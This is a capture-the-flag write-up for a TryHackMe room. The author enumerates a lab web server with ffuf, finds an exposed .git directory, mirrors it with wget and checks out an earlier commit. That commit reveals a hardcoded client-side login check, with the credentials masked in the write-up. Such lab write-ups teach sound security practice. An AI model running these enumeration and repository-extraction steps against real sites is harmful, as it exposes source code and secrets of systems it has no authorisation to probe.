Image by tryhackme.com
Git repositories contain commits that work in ways like blockchains where every commit is remembered forever. This is not a fault in Git, but a design feature that allows developers to quickly test and easily revert features if needed.
The git commit feature also makes it possible to get a detailed history of changes made to a project. This can be misused by an attacker if improper git commit hygiene is used by developers.
The room can be found on TryHackMe.
Enumeration
After connecting to the TryHackMe VPN, I started enumeration. After looking at the webpage source using the dev tools in Firefox, I found some interesting obfuscated JavaScript.
Screenshot from the Firefox dev tools, showing obfuscated JS.
This was interesting, but not enough to start digging deeper.
Next, I ran FFUF looking for some more details.
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://$VICTIM_IP/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.5.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.200.152/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 200, Size: 6890, Words: 541, Lines: 61, Duration: 58ms]
.git/HEAD [Status: 200, Size: 23, Words: 2, Lines: 2, Duration: 60ms]
css [Status: 301, Size: 194, Words: 7, Lines: 8, Duration: 57ms]
index.html [Status: 200, Size: 6890, Words: 541, Lines: 61, Duration: 60ms]
:: Progress: [4614/4614] :: Job [1/1] :: 682 req/sec :: Duration: [0:00:06] :: Errors: 0 ::
This did show that the .git directory was exposed to the internet.
Download repo
Since the enumeration phase showed that the .git directory was exposed to the internet, it was possible to use WGET to download it.
wget --mirror -I .git $VICTIM_IP/.git/
This downloaded the entire Git repo to my computer. Now I moved into the repository directory to start enumerating it for juicy details
cd $VICTIM_IP
Git log
Git is magical in the way that, if you have the .git directory locally on your computer you can "go back in time" to a previous version (commit) of the repository. To see the history of git commits, I used the git log command.
git log
commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD -> master, tag: v1.0)
Author: Adam Bertrand <hydragyrum@gmail.com>
Date: Thu Jul 23 22:22:16 2020 +0000
Update .gitlab-ci.yml
commit 77aab78e2624ec9400f9ed3f43a6f0c942eeb82d
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Fri Jul 24 00:21:25 2020 +0200
add gitlab-ci config to build docker file.
commit 2eb93ac3534155069a8ef59cb25b9c1971d5d199
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Fri Jul 24 00:08:38 2020 +0200
setup dockerfile and setup defaults.
commit d6df4000639981d032f628af2b4d03b8eff31213
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:42:30 2020 +0200
Make sure the css is standard-ish!
commit d954a99b96ff11c37a558a5d93ce52d0f3702a7d
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:41:12 2020 +0200
re-obfuscating the code to be really secure!
commit bc8054d9d95854d278359a432b6d97c27e24061d
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:37:32 2020 +0200
Security says obfuscation isn't enough.
They want me to use something called 'SHA-512'
commit e56eaa8e29b589976f33d76bc58a0c4dfb9315b1
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:25:52 2020 +0200
Obfuscated the source code.
Hopefully security will be happy!
commit 395e087334d613d5e423cdf8f7be27196a360459
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:17:43 2020 +0200
Made the login page, boss!
commit 2f423697bf81fe5956684f66fb6fc6596a1903cc
Author: Adam Bertrand <hydragyrum@gmail.com>
Date: Mon Jul 20 20:46:28 2020 +0000
Initial commit
The second commit (from the start / bottom) in the git log was a commit before the developer offuscates the JS code. This looks interesting. To go back in time to that commit, I used the git checkout command.
git checkout 395e087334d613d5e423cdf8f7be27196a360459
D README.md
HEAD is now at 395e087 Made the login page, boss!
Looking back in time
Now, when the local repo is at the commit before obfuscation, it's possible to look at the index.html file at that point in time.
cat index.html
...
<script>
function login() {
let form = document.getElementById("login-form");
console.log(form.elements);
let username = form.elements["username"].value;
let password = form.elements["password"].value;
if (
username === "*****" &&
password === "****************************"
) {
document.cookie = "login=1";
window.location.href = "/dashboard.html";
} else {
document.getElementById("error").innerHTML =
"INVALID USERNAME OR PASSWORD!";
}
}
</script>
</body>
</html>
That's it. You now have the flag 🎉